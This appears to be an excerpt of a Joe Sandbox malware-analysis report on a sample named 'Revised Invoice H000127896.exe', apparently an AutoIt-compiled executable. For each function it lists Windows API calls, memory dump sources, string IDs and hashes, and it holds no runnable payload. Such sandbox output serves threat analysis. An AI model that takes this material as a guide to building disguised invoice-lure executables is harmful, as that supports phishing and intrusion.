                              • API ID: AddressProc_free_malloc$_strcat_strlen
                              • String ID: AU3_FreeVar
                              • API String ID: 2634073740-771828931
                              • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                              • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                              • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                              • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                              APIs
                              • CoInitialize.OLE32 ref: 0046C63A
                              • CoUninitialize.OLE32 ref: 0046C645
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                              • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                              • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                              • IIDFromString.OLE32(?,?), ref: 0046C705
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                              • API String ID: 2294789929-1287834457
                              • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                              • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                              • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                              • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                              APIs
                                • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                              • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                              • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                              • ImageList_EndDrag.COMCTL32 ref: 00471169
                              • ReleaseCapture.USER32 ref: 0047116F
                              • SetWindowTextW.USER32(?,00000000), ref: 00471206
                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                              • API String ID: 2483343779-2107944366
                              • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                              • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                              • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                              • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                              APIs
                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                              • _wcslen.LIBCMT ref: 00450720
                              • _wcscat.LIBCMT ref: 00450733
                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$Window_wcscat_wcslen
                              • String ID: -----$SysListView32
                              • API String ID: 4008455318-3975388722
                              • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                              • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                              • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                              • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                              • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                              • GetParent.USER32 ref: 00469C98
                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                              • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                              • GetParent.USER32 ref: 00469CBC
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$CtrlParent$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 2360848162-1403004172
                              • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                              • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                              • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                              • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                              • String ID:
                              • API String ID: 262282135-0
                              • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                              • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                              • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                              • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                              APIs
                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                              • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                              • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                              • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                              • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                              • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                              APIs
                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                              • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                              • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                              • String ID:
                              • API String ID: 3771399671-0
                              • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                              • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00434643
                              • GetForegroundWindow.USER32(00000000), ref: 00434655
                              • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                              • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                              • String ID:
                              • API String ID: 2156557900-0
                              • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                              • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                              • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                              • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                              • API String ID: 0-1603158881
                              • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                              • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                              APIs
                              • CreateMenu.USER32 ref: 00448603
                              • SetMenu.USER32(?,00000000), ref: 00448613
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                              • IsMenu.USER32(?), ref: 004486AB
                              • CreatePopupMenu.USER32 ref: 004486B5
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                              • DrawMenuBar.USER32 ref: 004486F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                              • String ID: 0
                              • API String ID: 161812096-4108050209
                              • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                              • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Revised Invoice H000127896.exe), ref: 00434057
                              • LoadStringW.USER32(00000000), ref: 00434060
                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                              • LoadStringW.USER32(00000000), ref: 00434078
                              • _wprintf.LIBCMT ref: 004340A1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                              Strings
                              • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                              • C:\Users\user\Desktop\Revised Invoice H000127896.exe, xrefs: 00434040
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString$Message_wprintf
                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Revised Invoice H000127896.exe
                              • API String ID: 3648134473-3294151734
                              • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                              • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                              • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                              • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                              • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                              • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Revised Invoice H000127896.exe,0040F545,C:\Users\user\Desktop\Revised Invoice H000127896.exe,004A90E8,C:\Users\user\Desktop\Revised Invoice H000127896.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                              • MoveFileW.KERNEL32(?,?), ref: 00453932
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                              • String ID:
                              • API String ID: 978794511-0
                              • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                              • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
